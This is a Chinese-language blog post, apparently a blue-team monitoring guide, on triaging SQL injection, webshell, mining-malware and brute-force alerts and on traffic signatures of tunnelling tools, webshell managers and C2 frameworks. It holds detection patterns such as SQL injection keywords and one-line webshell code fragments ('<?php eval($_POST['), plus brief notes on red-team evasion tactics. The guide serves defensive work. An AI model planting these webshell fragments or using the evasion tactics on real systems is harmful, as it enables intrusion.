<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.2">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/Dota_128px_1143945_easyicon.net.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"mamor5409.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
<style>
    .pace .pace-progress {
        background: #1E92FB; /*进度条颜色*/
        height: 3px;
    }
    .pace .pace-progress-inner {
         box-shadow: 0 0 10px #1E92FB, 0 0 5px     #1E92FB; /*阴影颜色*/
    }
    .pace .pace-activity {
        border-top-color: #1E92FB;    /*上边框颜色*/
        border-left-color: #1E92FB;    /*左边框颜色*/
    }
</style>

  <meta property="og:type" content="article">
<meta property="og:title" content="2025蓝队监测分享">
<meta property="og:url" content="http://mamor5409.github.io/posts/a0e2d364/index.html">
<meta property="og:site_name" content="Mamor&#39;s Blog">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-2_16-18-3.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-2_16-18-32.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-3_11-48-5.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-3_11-33-24.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-3_11-49-28.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-3_11-51-6.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-3_11-51-55.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-3_11-52-5.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-3_11-58-36.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-3_14-10-37.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-2_16-26-26.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-7_14-27-42.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-7_16-18-54.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-7_16-20-47.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-7_16-22-42.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-7_16-23-34.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-7_16-23-54.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-7_16-23-58.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-7_16-24-19.png">
<meta property="article:published_time" content="2025-04-03T08:12:54.000Z">
<meta property="article:modified_time" content="2025-04-07T09:32:13.361Z">
<meta property="article:author" content="Mamor">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://mamor5409.github.io/posts/a0e2d364/image2025-4-2_16-18-3.png">

<link rel="canonical" href="http://mamor5409.github.io/posts/a0e2d364/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>2025蓝队监测分享 | Mamor's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Mamor's Blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Mamor's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
        <li class="menu-item menu-item-commonweal">

    <a href="/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>公益 404</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://mamor5409.github.io/posts/a0e2d364/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/kabi.jpg">
      <meta itemprop="name" content="Mamor">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Mamor's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2025蓝队监测分享
        </h1>

        <div class="post-meta">

			
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2025-04-03 16:12:54" itemprop="dateCreated datePublished" datetime="2025-04-03T16:12:54+08:00">2025-04-03</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-04-07 17:32:13" itemprop="dateModified" datetime="2025-04-07T17:32:13+08:00">2025-04-07</time>
              </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>10k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>9 分钟</span>
            </span>
            <div class="post-description"> </div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>注：部分内容取自网络，已标注相关参考链接。</p>
<h3 id="红队视角下的攻击"><a href="#红队视角下的攻击" class="headerlink" title="红队视角下的攻击"></a>红队视角下的攻击</h3><h4 id="红队攻击流程"><a href="#红队攻击流程" class="headerlink" title="红队攻击流程"></a>红队攻击流程</h4><p>1.信息收集 IT资产信息、敏感信息、供应链信息、组织架构信息</p>
<p>2.外网打点 社工钓鱼 - 邮件钓鱼、微信钓鱼、客服/维护、水坑攻击、社工近源 漏洞利用 - 传统漏洞攻击、0day/Nday</p>
<p>3.内网横向 信息获取、漏洞利用、网络通路、靶标获取</p>
<h4 id="红队攻击手法"><a href="#红队攻击手法" class="headerlink" title="红队攻击手法"></a>红队攻击手法</h4><p>1.分工明确：高、专、精 。外网打点、内网攻击、社工钓鱼、供应链攻击、代码审计、报告撰写</p>
<p>2.统一、集成化武器库：工具指纹修改、工具免杀处理、0Day/NDay储备、一键利用漏洞攻击</p>
<p>3.规避蓝队溯源：虚拟机攻击、IP代理池、自动识别蜜罐、CDN域前置等</p>
<p>4.攻击时间段：每天04:00-08:00 并不一定是红队最疲乏的攻击时间段</p>
<p>5.核心关键隧道：CS替换默认证书、替换请求路径、域前置、云函数</p>
<p>6.重点攻击对象：人事（人事-&gt;领导-&gt;运维） 大鱼钓小鱼 「运维终端、集权设备、网络通路」</p>
<h4 id="攻击方作业特点"><a href="#攻击方作业特点" class="headerlink" title="攻击方作业特点"></a>攻击方作业特点</h4><p><img src="/posts/a0e2d364/image2025-4-2_16-18-3.png" alt></p>
<h4 id="攻击方得分点"><a href="#攻击方得分点" class="headerlink" title="攻击方得分点"></a>攻击方得分点</h4><p>1.获取权限</p>
<p>2.突破边界网络</p>
<p>3.获取目标系统权限</p>
<p>4.重要数据</p>
<p>5.其他： 发现历史攻击事件</p>
<h3 id="安全威胁事件分析"><a href="#安全威胁事件分析" class="headerlink" title="安全威胁事件分析"></a>安全威胁事件分析</h3><h4 id="攻击者意图分析"><a href="#攻击者意图分析" class="headerlink" title="攻击者意图分析"></a>攻击者意图分析</h4><p>通过手动或脚本、漏扫工具等探测Web页面，通过返回信息寻找薄弱点进行漏洞利用</p>
<h4 id="常见的告警类型"><a href="#常见的告警类型" class="headerlink" title="常见的告警类型"></a>常见的告警类型</h4><p>Sql注入、Webshell上传、Webshell访问、跨站脚本攻击、中间件漏洞攻击、反序列化漏洞、 框架漏洞、扫描行为、代码执行等等</p>
<h4 id="威胁告警分析思路"><a href="#威胁告警分析思路" class="headerlink" title="威胁告警分析思路"></a>威胁告警分析思路</h4><p>1.优先排查告警成功且安全等级高的告警</p>
<p>2.优先排查请求响应成功的攻击「返回值为200」</p>
<p>3.通过原地址或目的地址作为筛选条件，若是在短时间内某个地址发起大量攻击行为，多为异常安全事件，恶意攻击 发生概率较高。</p>
<p>4.查看攻击的详细页面，通过请求内容判断攻击行为，通过返回内容的字段进行分析研判是否攻击成功。</p>
<p>5.从内到外的攻击更需重点关注、分析处理，可能是内网失陷机器对外发起攻击。（如有拿不准的告警可尝试问下AI或者其他同事）</p>
<h4 id="攻击行为判断"><a href="#攻击行为判断" class="headerlink" title="攻击行为判断"></a>攻击行为判断</h4><h5 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h5><p>判断是否为攻击行为：</p>
<p>1.在请求数据中判断是否包括人为构造的sql语句</p>
<p>2.判断请求数据中的sql语句是否为正常业务常用语句</p>
<p>3.若攻击类型为布尔盲注，在请求数据中会存在探试数据库类型、数据库库名、表名、字段、字符长度的特征， 以及试探数据库类型是会用到敏感数据库名，例如“information_schema.tables”“msysobjects”“sysobjects”</p>
<p>4.若攻击类型为联合注入，在请求数据中会出现如“union select” 的联合查询特征</p>
<p>5.若攻击类型为报错注入，在请求数据中会出现“rand(0)”“ updatexml()”“exp()”“floor()”“group by”等攻击特征、</p>
<p>6.若攻击类型为延时注入，在请求数据中会出现 “sleep()”“benchmarkI()”的攻击特征</p>
<p>判断是否攻击成功： 查看响应数据中返回的响应状态及响应内容，与正常页面访问时返回的数据机械能对比，分析数据返回包总是否泄露 数据数据、对攻击者的攻击语句进行分析，对告警量最大的SQL语句重点关注。【在可授权的情况下使用SQLMAP对 参数进行测试确定是否存在注入漏洞】</p>
<p>误报情况： 有时间规律、高频率触发安全告警且攻击数据量方向为内到内的无敏感sql攻击字段的日志多为误报。</p>
<h5 id="Webshell上传"><a href="#Webshell上传" class="headerlink" title="Webshell上传"></a>Webshell上传</h5><p>判断是否为攻击行为：</p>
<ol>
<li>请求数据汇总多会存在 filename、 xx.txt.php ，着重检查文件上传行为中 文件名是否包含非允许的文件格式 【比如 php、asp、aspx、ashx、jsp等】</li>
<li>结合请求内容，分析写入文件的内容是否含有webshell代码特征。</li>
</ol>
<p>ASP代码特征： <code>Execute(request execute request( eval request(</code></p>
<p>PHP代码特征：<code>&lt;?php eval($_POST[ &lt;?php system($_REQUEST[</code></p>
<p>ASPX木马特征： <code>&lt;%@ import Namespace=””%&gt; &lt;%@ Assembly Name=””%&gt;</code></p>
<p>判断是否攻击成功： 1.结合响应状态与相应内容，判断后门文件是否上传成功 2.查看后续告警是否出现webshell访问成功实践</p>
<h5 id="主机感染挖矿-僵木蠕"><a href="#主机感染挖矿-僵木蠕" class="headerlink" title="主机感染挖矿/僵木蠕"></a>主机感染挖矿/僵木蠕</h5><p>攻击者通过各种手段将挖矿程序植入受害者的计算机中，在受害者不知情的情况下利用其计算机的云算力进行挖矿，从而获取利益。同时被感染木马主机会通过漏洞利用等手段进行横向传播，由于挖矿程序会占用大量系统资源，容易导致Cpu温度过高、终端无法正常工作、服务器瘫痪等问题。</p>
<p>监测分析方法：</p>
<p>1.查询受害主机请求的域名(requestDomain)或IP的威胁报，判断其是否为恶意域名或恶意P。</p>
<p>2.分析请求报文是否含有挖矿病毒或勒索病毒通信特征.</p>
<p>3.观察主机的异常行为周期是否疑似感染病毒。</p>
<p>4.根据威胁情报查找病毒家族，获取更多病毒信息</p>
<p>5.确认内网感染该病毒主机的数量确认感染范围以及首次告警主机及时间</p>
<p>6.确认入侵方式，重点关注告警结果=成功的告警</p>
<p>7.是否存在横向扩散。查询相关主机告警是否存在横向扫描扩散行为，例如永恒之蓝扫描</p>
<h5 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h5><p>攻击者意图初步分析： 攻击者通过密码宇典或随机组合密码的方式尝试登陆服务器（针对的是全网机器），利用服务认证缺陷，使用登录口令字典库进行高频率尝试从而获取服务权限。</p>
<p>常见告警： SSH暴力破解、Windows账号暴力破解、ftp暴力破解、web账号暴力破解、SMB账号暴力破解、Mysql账号暴力破解</p>
<p>攻击行为判断： 短时间内存在大量尝试登录的行为</p>
<p>判断是否成功攻击： 查看近期登录日志，判断是否成功登录</p>
<p>注意事项：</p>
<p>1.ssh、rdp、smb协议认证是加密传输的，因此这一类判断是否攻击成功，需要结合查看系统登录日志是否存在登录成功日志来判断</p>
<p>2.关注攻击源是内部还是外部，如果是外部攻击，建议在服务器端查看系统日志，有没有异常登陆成功情况，提醒用户注意密码强度，及时更换密码，如果是内部攻击内部或外部，需要考虑是不是有主机感染病毒失陷的情况；</p>
<p>3.针对暴力破解成功的告警首要工作验证用户破解的账户的真实性，若验证成功且确认为非授权访问则进行下阶段告警处置操作。</p>
<h5 id="主机漏洞"><a href="#主机漏洞" class="headerlink" title="主机漏洞"></a>主机漏洞</h5><p>常见告警：检测到主机存在永恒之蓝漏洞、ms17010永恒之蓝漏洞攻击 可在请求数据中分析如下该漏洞利用过程：</p>
<p>1.首先攻击机向靶机发送一个SMB的Negotiate Protocol Request(协商协议请求）数据报，并列出攻击机所支持的SMB协议版本。</p>
<p>2.服务器响应一个SMB的Negotiate Protocol Response（协商协议响应）数据报;（如果无可使用的协议版本则返回OXFFFFH，结束通信)</p>
<p>3.攻击机向靶机 (Windows 2008 R2） 发起个Session setup X request (会话设置请求）数据报，会话的用户身份为：anonymous （匿名用户）</p>
<p>4.靶机确认身份后发送一个Session Setup × Response(会话设置响应） 数据报同意本次连接。</p>
<p>5.协商和认证成功之后，攻击机向靶机发送一个Tree Connect AndX Request (树连接和请求）数据报，列出要访问的网络资源的名称（居名管道共享)</p>
<p>6.服务器会发送—个Tree Connect Andx Response (树连接和响应）数据报，同意访问资源，并列出访问者的权限</p>
<p>7.连接到相应资源后，进行正常的网络共享访问 SMB客户端通过：open SMB、read SMB、write SMB、close SMB实现打开、读取、写入、关闭共享文件。</p>
<p><img src="/posts/a0e2d364/image2025-4-2_16-18-32.png" alt="image2025-4-2_16-18-32"></p>
<h4 id="常见的攻击特征"><a href="#常见的攻击特征" class="headerlink" title="常见的攻击特征"></a>常见的攻击特征</h4><h5 id="代理工具"><a href="#代理工具" class="headerlink" title="代理工具"></a>代理工具</h5><p>较为常见的代理工具有 FRP、NPS、Neo-reGeorg、Venom</p>
<p><img src="/posts/a0e2d364/image2025-4-3_11-48-5.png" alt="image2025-4-3_11-48-5"></p>
<p>(1) Frp</p>
<p> 1.客户端-&gt;服务端认证信息包含version，hostname,os,arch,user,privilege_key,runid,metas等frp信息</p>
<p>2.服务端-&gt;客户端认证信息包含version,run_id,server_udp_port等frp信息</p>
<p>3.可以看到攻击者vps-ip、出口ip、和被用作穿透的内网机器计算机名</p>
<p>1.首先，Frp 会使用自定义协议进行通信，其默认端口为7000，该端口在流量中是可以被识别出来的。</p>
<p>2.Frp 在启动时，会在流量中进行特定的标识，例如会发送“frps”或“frpc”字符串，用于标识是服务端还是客户端。</p>
<p>3.Frp 会使用心跳包来维持与服务器之间的连接，心跳包的特征是由两个字节的包头和固定长度的包体组成。</p>
<p>4.在正常使用过程中，Frp 会产生大量的 TCP 连接，每个连接都对应着一个隧道，通过观察连接的建立和断开可以推断出 Frp 是否正在被使用。</p>
<p>连接过程中，如果没有进行加密的情况下可以看到连接的主机名称，以及相关ini配置文件的内容。流量中一般会有受害主机的IP地址等。frpc 在连接认证 frps 的时候，会进行三次握手，会把 Frp 的版本信息发给 frps 进行认证，如果是用的一个没有改过的Frp 那么这时候只要建立连接，很容易就会被安全设备捕获到。</p>
<p>一般流量中带有Version、Arch、User、Privilege_key等字段。</p>
<p><img src="/posts/a0e2d364/image2025-4-3_11-33-24.png" alt="image2025-4-3_11-33-24"></p>
<p>小结：</p>
<p>1.客户端回向服务端发送包含 version，hostname,os,arch,user,privilege_key,runid,metas 的json数据</p>
<p>2.服务端回发送 包含 version,run_id,server_udp_port 的json数据</p>
<p>(2) Nps</p>
<p>追踪TCP数据流 可发现 存在 sucs 的特征字段</p>
<p><img src="/posts/a0e2d364/image2025-4-3_11-49-28.png" alt="image2025-4-3_11-49-28"></p>
<p>客户端向服务端发起的请求信息，其中包含TST的标志性的字符串，客户端大致版本和客户端具体的版本号</p>
<p><img src="/posts/a0e2d364/image2025-4-3_11-51-6.png" alt="image2025-4-3_11-51-6"></p>
<p>服务端会向客户端返回 md5加密的版本号</p>
<p><img src="/posts/a0e2d364/image2025-4-3_11-51-55.png" alt="image2025-4-3_11-51-55"></p>
<p><img src="/posts/a0e2d364/image2025-4-3_11-52-5.png" alt="image2025-4-3_11-52-5"></p>
<p>小结：</p>
<p>1.流量中存在 TST、sucs、main 字段</p>
<p>2.客户端向服务端发起的请求信息 会包含TST及版本号，服务端向客户端发送md5加密的版本号</p>
<p>3.认证成功后，服务端向客户端发送sucs，客户端发送main</p>
<p>(3)Neo-reGeorg</p>
<p>在浏览器html中存在一段注释的字符串</p>
<p><img src="/posts/a0e2d364/image2025-4-3_11-58-36.png" alt="image2025-4-3_11-58-36"></p>
<p>(4)Vemon</p>
<p>流量中包含 “ABCDEFGH”、”VCMD” 字段特征</p>
<p><img src="/posts/a0e2d364/image2025-4-3_14-10-37.png" alt="image2025-4-3_14-10-37"></p>
<h5 id="Webshell"><a href="#Webshell" class="headerlink" title="Webshell"></a>Webshell</h5><p>较为常见的是蚁剑、哥斯拉、冰蝎</p>
<p>1.蚁剑</p>
<p>(1) 默认的User-Agent请求头：蚁剑的默认User-Agent请求头通常为“antsword xxx”，但这个值是可以修改的。</p>
<p>(2) 请求体特征：PHP类WebShell流量请求体通常都以@ini_set(“display_errors”,”0”);@set_time_limit(0)开头</p>
<p>(3) Webshell静态与动态特征：</p>
<p>在使用蚁剑上传和管理Webshell时，不同的脚本语言（如PHP、ASP、JSP）会展现出不同的静态特征。例如，PHP中可能使用assert、eval执行代码，而ASP则主要依赖eval执行。</p>
<p>动态特征方面，通过上传Webshell并抓包分析，可以发现每个请求体都包含特定的代码片段（如上述的@ini_set等），并且响应体通常会进行base64编码混淆，解码后，可以观察到攻击行为的payload。</p>
<p>(4) 加密与混淆：蚁剑使用了AES加密，同时采用二进制协议通信，在混淆加密后，参数名大多以“_0x…..=”的形式出现，其中“_0x”后面的部分通常是加密后的数据。</p>
<p>(5) URL加密：蚁剑的正文内容通常使用URL加密，解密后的流量中，上述的@ini_set(“display_errors”,”0”)等特征会更为明显</p>
<p> 2.冰蝎</p>
<p>(1) appect ：Acceptlaoolication/json text/javascript /;q=0.01</p>
<p>(2) content-length 有规律 每次+1【连接的端口有一定的特征，冰蝎与webshell建立连接的同时，java也与目的主机建立tcp连接，每次连接使用本地端口在49700左右(就是比较大的端口)，每连接一次，每建立一次新的连接，端口就依次增加。】</p>
<p>(3) user-agent ：同一个IP请求 UA会不断变化</p>
<p>(4) aes 加密 + base64 编码</p>
<p> 3.哥斯拉</p>
<p>(1) Webshell特征：使用eval和base64编码。eval函数用于执行传递的攻击payload，而base64编码则用于混淆和隐藏数据。</p>
<p>(2) 请求包特征： </p>
<p>①请求包通常以“pass=”为起始，这是一个用于传递认证信息的常见参数；</p>
<p>②哥斯拉的请求包通常较长，而响应包长度可能为0； </p>
<p>③在一个TCP包中可能包含三个HTTP请求</p>
<p>④User-Agent字段在默认情况下类似于“Java/1.8.0_121”，具体版本取决于JDK环境版本</p>
<p>⑤Cookie字段中存在一个关键的特征，即最后一个Cookie值的末尾有一个不必要的分号，在标准的HTTP请求中，最后一个Cookie的值后面不应该出现分号</p>
<p>(3) 响应包特征：哥斯拉的响应包具有特定的结构特征，即整个响应包的结构体征为：md5前十六位+base64+md5后十六位</p>
<p>强特征：</p>
<ul>
<li>cookie字段 值最后有一个分号。</li>
<li>paylod特征：jsp会出现xc,pass字符和Java反射，base64加解码等特征，php，asp则为普通的一句话木马。</li>
<li>⼀个 tcp 包中有三个 http</li>
</ul>
<h5 id="C2流量特征"><a href="#C2流量特征" class="headerlink" title="C2流量特征"></a>C2流量特征</h5><p>常见的C2(Command and Control) 主要包括 CobaltStrike、Meterpreter</p>
<p>1.CobaltStrike流量特征</p>
<p>(1) DNS请求异常：DNS隧道技术来传输数据，在DNS请求中，域名可能以特定前缀开头（如“cdn.”、“www6.”、“api.”等），查询结果可能包含非常规的IP地址，这些地址用于指令传输或心跳检测。</p>
<p>(2) 心跳包特征：CobaltStrike通过发送心跳包来保持与被控端的通信。这些心跳包可能是定期发送的，默认间隔通常为60秒，用于确认被控端的在线状态。</p>
<p>(3)源码特征：在流量中通过http协议的url路径，经过checksum8解密算法计算后，32位的后门的结果是92L，而64位的后门的结果是93L</p>
<p>2,Metasploit 流量特征</p>
<p>(1) 端口号：msf数据库默认使用的postgresql的端口可能是5432，msf默认使用4444端口作为反向连接端口</p>
<p>(2) 数据内容：msf数据包通常包含特定字符串”meterpreter”、”revshell”等</p>
<p>(3) 特殊协议：MSF 框架通常会使用一些特殊的协议，例如 Meterpreter、Reverse TCP 等</p>
<h3 id="应急响应排查处置"><a href="#应急响应排查处置" class="headerlink" title="应急响应排查处置"></a>应急响应排查处置</h3><h4 id="常用工具"><a href="#常用工具" class="headerlink" title="常用工具"></a>常用工具</h4><h5 id="Windows工具"><a href="#Windows工具" class="headerlink" title="Windows工具"></a>Windows工具</h5><blockquote>
<p>PCHunter：<a target="_blank" rel="noopener" href="http://www.xuetr.com">http://www.xuetr.com</a></p>
<p>火绒剑：<a target="_blank" rel="noopener" href="https://www.huorong.cn">https://www.huorong.cn</a></p>
<p>Process Explorer：<a target="_blank" rel="noopener" href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer">https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer</a></p>
<p>processhacker：<a target="_blank" rel="noopener" href="https://processhacker.sourceforge.io/downloads.php">https://processhacker.sourceforge.io/downloads.php</a></p>
<p>autoruns：<a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns">https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns</a></p>
<p>卡巴斯基：<a target="_blank" rel="noopener" href="http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe">http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe</a> （绿色版、最新病毒库）</p>
<p>火绒安全软件：<a target="_blank" rel="noopener" href="https://www.huorong.cn">https://www.huorong.cn</a></p>
<p>360杀毒：<a target="_blank" rel="noopener" href="http://sd.360.cn/download_center.html">http://sd.360.cn/download_center.html</a></p>
<p>Hawkeye <a target="_blank" rel="noopener" href="https://github.com/mir1ce/Hawkeye">https://github.com/mir1ce/Hawkeye</a> 一款GUI Windows应急工具【未开源 自行谨慎使用】</p>
</blockquote>
<h5 id="Linux-工具"><a href="#Linux-工具" class="headerlink" title="Linux 工具"></a>Linux 工具</h5><blockquote>
<p>Linuxcheckshoot<a target="_blank" rel="noopener" href="https://github.com/sun977/linuxcheckshoot"> https://github.com/sun977/linuxcheckshoot</a></p>
<p>LinuxScan <a target="_blank" rel="noopener" href="https://github.com/zero-typora/LinuxScan">https://github.com/zero-typora/LinuxScan</a></p>
<p>Ashro_linux <a target="_blank" rel="noopener" href="https://github.com/Ashro-one/Ashro_linux/blob/main/Ashro_linux.sh">https://github.com/Ashro-one/Ashro_linux/blob/main/Ashro_linux.sh</a> </p>
</blockquote>
<p>必要时可自行更改代码功能</p>
<h5 id="在线网站"><a href="#在线网站" class="headerlink" title="在线网站"></a>在线网站</h5><blockquote>
<p>微步在线威胁情报社区：<a target="_blank" rel="noopener" href="https://x.threatbook.cn">https://x.threatbook.cn</a></p>
<p>微步云沙箱：<a target="_blank" rel="noopener" href="https://s.threatbook.com/">https://s.threatbook.com/</a></p>
<p>Virustotal：<a target="_blank" rel="noopener" href="https://www.virustotal.com">https://www.virustotal.com</a></p>
<p>Virscan：<a target="_blank" rel="noopener" href="http://www.virscan.org">http://www.virscan.org</a></p>
<p>腾讯哈勃分析系统：<a target="_blank" rel="noopener" href="https://habo.qq.com">https://habo.qq.com</a></p>
<p>AnyRun：<a target="_blank" rel="noopener" href="https://any.run/">https://any.run/</a></p>
<p>D盾_Web查杀：<a target="_blank" rel="noopener" href="http://www.d99net.net/index.asp">http://www.d99net.net/index.asp</a> </p>
<p>河马 WebShell 查杀：<a target="_blank" rel="noopener" href="http://www.shellpub.com">http://www.shellpub.com</a></p>
</blockquote>
<h4 id="应急排查思路"><a href="#应急排查思路" class="headerlink" title="应急排查思路"></a>应急排查思路</h4><h5 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h5><blockquote>
<p>1.检查系统账号安全</p>
<p>2.检查异常进程和端口</p>
<p>3.检查系统启动项、计划任务、服务</p>
<p>4.常见可疑目录文件</p>
<p>5.本地查杀</p>
<p>6.日志分析</p>
</blockquote>
<h5 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h5><blockquote>
<p>1.检查系统账号安全</p>
<p>2.History历史命令</p>
<p>3.监测异常进程和端口</p>
<p>4.开机启动项</p>
